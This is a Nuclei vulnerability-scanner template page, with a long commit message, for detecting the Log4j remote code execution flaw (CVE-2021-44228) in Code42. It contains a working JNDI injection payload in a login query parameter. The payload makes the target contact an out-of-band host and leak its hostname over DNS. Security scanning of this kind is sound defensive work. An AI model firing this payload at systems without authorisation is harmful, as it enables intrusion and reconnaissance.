nuclei-templates/vulnerabilities/code42/code42-log4j-rce.yaml

36 lines
1.1 KiB
YAML
Raw Normal View History

Added 23 Nuclei Templates (#3909) * Added 23 Nuclei Templates * Update cofense-vision-detection.yml * Update sophos-mobile-panel-detection.yml * Update cofense-vision-detection.yml * Update httpbin-open-redirect.yml * Update httpbin-xss.yml * Update ansible-semaphore-panel.yml * Rename ansible-semaphore-panel.yml to ansible-semaphore-panel.yaml * Update and rename avatier_password_management.yml to avatier-password-management.yaml * Update and rename buddy-panel.yml to buddy-panel.yaml * Update and rename buildbot-panel.yml to buildbot-panel.yaml * Update and rename cofense-vision-detection.yml to cofense-vision-panel.yaml * Update and rename concourse-ci-panel.yml to concourse-ci-panel.yaml * Update and rename drone-ci-panel.yml to drone-ci-panel.yaml * Update and rename flowci-detection.yml to flowci-panel.yaml * Update and rename gradle-enterprise-build-cache-detect.yml to gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-cache-node-detect.yaml to exposed-panels/gradle/gradle-cache-node-detect.yaml * Update and rename exposed-panels/gradle-enterprise-panel.yml to exposed-panels/gradle/gradle-enterprise-panel.yaml * Update and rename httpbin-detection.yml to httpbin-panel.yaml * Update and rename leostream-detection.yml to leostream-panel.yaml * Delete redash-detection.yml * Update and rename sophos-mobile-panel-detection.yml to sophos-mobile-panel.yaml * Update and rename splunk-enterprise-login-panel.yml to splunk-enterprise-panel.yaml * Update splunk-enterprise-panel.yaml * Update and rename stridercd-detection.yml to stridercd-panel.yaml * Update and rename zuul-panel.yml to zuul-panel.yaml * Update and rename zentral-detection.yml to zentral-panel.yaml * Update and rename api-fastly.yml to api-fastly.yaml * Update and rename api-gitlab.yml to api-gitlab.yaml * Update and rename httpbin-xss.yml to httpbin-xss.yaml * Update and rename httpbin-open-redirect.yml to httpbin-open-redirect.yaml * Update and rename log4j-code42-rce.yml to code42-log4j-rce.yaml * minor matcher fixes * added missing hostname variable * meta data update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-03-16 13:17:58 +00:00
id: code42-log4j-rce
info:
name: Log4j Code42 RCE
author: Adam Crosser
severity: critical
description: Remote code execution via log4j vulnerability
reference: https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents
classification:
cve-id: CVE-2021-44228
tags: jndi,log4j,rce,cve,cve2021,oast,code42
requests:
- method: GET
path:
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output